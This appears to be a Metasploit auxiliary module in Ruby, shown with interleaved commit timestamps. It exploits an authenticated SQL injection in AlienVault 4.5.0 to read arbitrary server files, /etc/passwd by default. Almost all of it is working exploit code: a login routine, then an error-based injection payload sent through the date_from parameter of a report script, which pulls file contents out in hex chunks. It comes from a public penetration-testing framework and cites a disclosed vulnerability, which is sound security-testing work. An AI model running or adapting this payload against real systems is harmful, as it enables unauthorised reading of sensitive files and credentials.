metasploit-framework/modules/auxiliary/gather/alienvault_iso27001_sqli.rb

153 lines
4.2 KiB
Ruby
Raw Normal View History

2014-04-02 20:09:46 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
2014-04-02 20:09:46 +00:00
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Auxiliary
2014-04-02 20:09:46 +00:00
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
2014-04-02 20:22:21 +00:00
'Name' => "AlienVault Authenticated SQL Injection Arbitrary File Read",
2014-04-02 20:09:46 +00:00
'Description' => %q{
2014-04-04 04:22:44 +00:00
AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG
generation PHP file. This module exploits this to read an arbitrary file from
the file system. Any authenticated user is able to exploit it, as administrator
2014-04-04 04:22:44 +00:00
privileges aren't required.
2014-04-02 20:09:46 +00:00
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brandon Perry <bperry.volatile[at]gmail.com>' #meatpistol module
],
'References' =>
2014-04-04 04:22:44 +00:00
[
['EDB', '32644']
2014-04-02 20:09:46 +00:00
],
2014-04-04 12:55:35 +00:00
'DefaultOptions' =>
2014-04-04 04:22:44 +00:00
{
'SSL' => true
},
2014-04-02 20:09:46 +00:00
'Platform' => ['linux'],
'Privileged' => false,
'DisclosureDate' => "Mar 30 2014"))
register_options(
[
Opt::RPORT(443),
2014-04-04 04:22:44 +00:00
OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),
OptString.new('USERNAME', [ true, 'Single username' ]),
OptString.new('PASSWORD', [ true, 'Single password' ]),
OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ])
2014-04-02 20:09:46 +00:00
], self.class)
end
def run
2014-04-04 04:22:44 +00:00
2016-02-01 22:06:34 +00:00
print_status("Get a valid session cookie...")
2014-04-02 20:09:46 +00:00
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')
})
2014-04-04 14:13:43 +00:00
unless res and res.code == 200
2016-02-01 22:06:34 +00:00
print_error("Server did not respond in an expected way")
2014-04-04 04:22:44 +00:00
return
2014-04-03 13:15:09 +00:00
end
2014-04-02 20:09:46 +00:00
cookie = res.get_cookies
2014-04-04 04:22:44 +00:00
if cookie.blank?
2016-02-01 22:06:34 +00:00
print_error("Could not retrieve a cookie")
2014-04-04 04:22:44 +00:00
return
end
2014-04-02 20:09:46 +00:00
post = {
'embed' => '',
'bookmark_string' => '',
'user' => datastore['USERNAME'],
'passu' => datastore['PASSWORD'],
'pass' => Rex::Text.encode_base64(datastore['PASSWORD'])
}
2016-02-01 22:06:34 +00:00
print_status("Login...")
2014-04-04 04:22:44 +00:00
2014-04-02 20:09:46 +00:00
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'),
'method' => 'POST',
'vars_post' => post,
'cookie' => cookie
})
2014-04-04 14:13:43 +00:00
unless res and res.code == 302
2016-02-01 22:06:34 +00:00
print_error("Server did not respond in an expected way")
2014-04-04 04:22:44 +00:00
return
2014-04-03 13:15:09 +00:00
end
2014-04-04 04:22:44 +00:00
unless res.headers['Location'] && res.headers['Location'] == normalize_uri(target_uri.path, 'ossim/')
2016-02-01 22:06:34 +00:00
print_error("Authentication failed")
2014-04-04 04:22:44 +00:00
return
2014-04-02 20:09:46 +00:00
end
cookie = res.get_cookies
2014-04-04 14:13:43 +00:00
if cookie.blank?
2016-02-01 22:06:34 +00:00
print_error("Could not retrieve the authenticated cookie")
2014-04-04 14:13:43 +00:00
return
end
2014-04-02 20:09:46 +00:00
i = 0
full = ''
filename = datastore['FILEPATH'].unpack("H*")[0]
2014-04-03 12:41:00 +00:00
left_marker = Rex::Text.rand_text_alpha(6)
right_marker = Rex::Text.rand_text_alpha(6)
2014-04-02 20:09:46 +00:00
2016-02-01 22:06:34 +00:00
print_status("Exploiting SQLi...")
2014-04-02 20:09:46 +00:00
2014-04-04 04:22:44 +00:00
loop do
file = sqli(left_marker, right_marker, i, cookie, filename)
return if file.nil?
break if file.empty?
2014-04-02 20:09:46 +00:00
str = [file].pack("H*")
full << str
vprint_status(str)
i = i+1
end
path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH'])
print_good("File stored at path: " + path)
end
2014-04-04 04:22:44 +00:00
def sqli(left_marker, right_marker, i, cookie, filename)
pay = "2014-02-28' AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{filename})) AS CHAR),"
pay << "0x20)),#{(50*i)+1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
pay << " GROUP BY x)a) AND 'xnDa'='xnDa"
get = {
'date_from' => pay,
'date_to' => '2014-03-30'
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ossim', 'report', 'BusinessAndComplianceISOPCI', 'ISO27001Bar1.php'),
'cookie' => cookie,
'vars_get' => get
})
if res and res.body and res.body =~ /#{left_marker}(.*)#{right_marker}/
return $1
else
print_error("Server did not respond in an expected way")
return nil
end
end
2014-04-02 20:09:46 +00:00
end